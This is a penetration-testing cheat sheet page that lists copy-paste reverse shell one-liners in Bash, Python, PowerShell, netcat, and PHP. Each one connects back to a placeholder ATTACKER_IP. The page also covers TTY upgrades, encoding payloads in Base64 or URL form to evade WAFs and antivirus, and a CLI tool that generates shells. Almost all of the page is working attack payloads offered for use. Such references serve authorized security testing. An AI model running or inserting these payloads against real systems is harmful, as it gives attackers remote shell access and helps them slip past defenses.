OffSecKitOffSecKit

Reverse Shell Cheat Sheet 2026 — One-Liners for Every Language

Complete reverse shell cheat sheet with one-liners in Bash, Python, PowerShell, PHP, Ruby, Perl, Netcat, and more. Copy-paste ready for your next pentest.

Try the Reverse Shell Generator

A reverse shell is one of the most fundamental techniques in penetration testing. When you find a command injection vulnerability or gain code execution on a target, a reverse shell gives you an interactive session to work with — connecting the target back to your machine.

This guide covers reverse shell one-liners for every common language and scenario you'll encounter during engagements. Every command listed here is also available in our Reverse Shell Generator with encoding options.

How Reverse Shells Work

In a reverse shell, the target machine initiates a connection back to the attacker. This is the opposite of a bind shell, where the attacker connects to a port opened on the target. Reverse shells are preferred because outbound connections are far less likely to be blocked by firewalls.

The basic flow is:

  1. Set up a listener on your attack machine (e.g., nc -lvnp 4444)
  2. Execute the reverse shell payload on the target
  3. The target connects back to your listener, giving you a shell

Bash Reverse Shells

Bash reverse shells are the go-to when you know the target is running a Linux system with Bash installed. They use the /dev/tcp pseudo-device.

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

If /dev/tcp isn't available (some stripped-down containers), try the mkfifo approach with netcat instead.

Python Reverse Shells

Python is installed on most Linux systems and many Windows targets. Python reverse shells are reliable and give you a PTY.

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER_IP",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

The pty.spawn call is important — it gives you a proper interactive terminal rather than a dumb shell. Without it, you won't get tab completion, arrow keys, or job control.

PowerShell Reverse Shells

For Windows targets, PowerShell is your best option. It's installed by default on every modern Windows system.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

For AV evasion, consider Base64 encoding the payload and using powershell -e [base64]. Our generator handles this encoding automatically.

Netcat Reverse Shells

Netcat is the Swiss Army knife of networking. The -e flag is the simplest approach, but it's not available in every version.

nc ATTACKER_IP 4444 -e /bin/bash

If -e isn't available, use the mkfifo method:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f

PHP Reverse Shells

Common in web application exploitation, especially against WordPress and other PHP-based CMS platforms.

php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("bash <&3 >&3 2>&3");'

Upgrading Your Shell

Once you have a reverse shell, you'll want to upgrade it to a fully interactive TTY. The standard approach:

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z to background
stty raw -echo; fg
# Then type: export TERM=xterm

This gives you tab completion, command history, and Ctrl+C support.

When to Use Each Type

  • Bash — Linux targets, simplest option when Bash is available
  • Python — Cross-platform, gives you a PTY out of the box
  • PowerShell — Windows targets, no additional tools needed
  • Netcat — When nc is installed, most reliable
  • PHP — Web app exploitation, command injection in PHP apps
  • Socat — When you need encrypted or advanced shells

Encoding for Evasion

Many WAFs and input filters block common reverse shell characters like pipes, redirects, and semicolons. Encoding your payload can bypass these:

  • Base64 — Most common, works with echo [payload] | base64 -d | bash
  • URL encoding — Useful for web-based command injection
  • Double URL encoding — Bypasses filters that decode once before checking

Our Reverse Shell Generator supports all of these encoding methods — select your language, enter your IP and port, choose an encoding, and copy the result.

CLI Version

Prefer working from the terminal? Install the CLI version via pip:

pip install offseckit-revshell

Then generate shells directly from your terminal:

revshell -i 10.10.10.10 -p 4444 -l python
revshell -i 10.10.10.10 -l bash -e base64
revshell -i 10.10.10.10 -l netcat --all

Source code and full documentation on GitHub.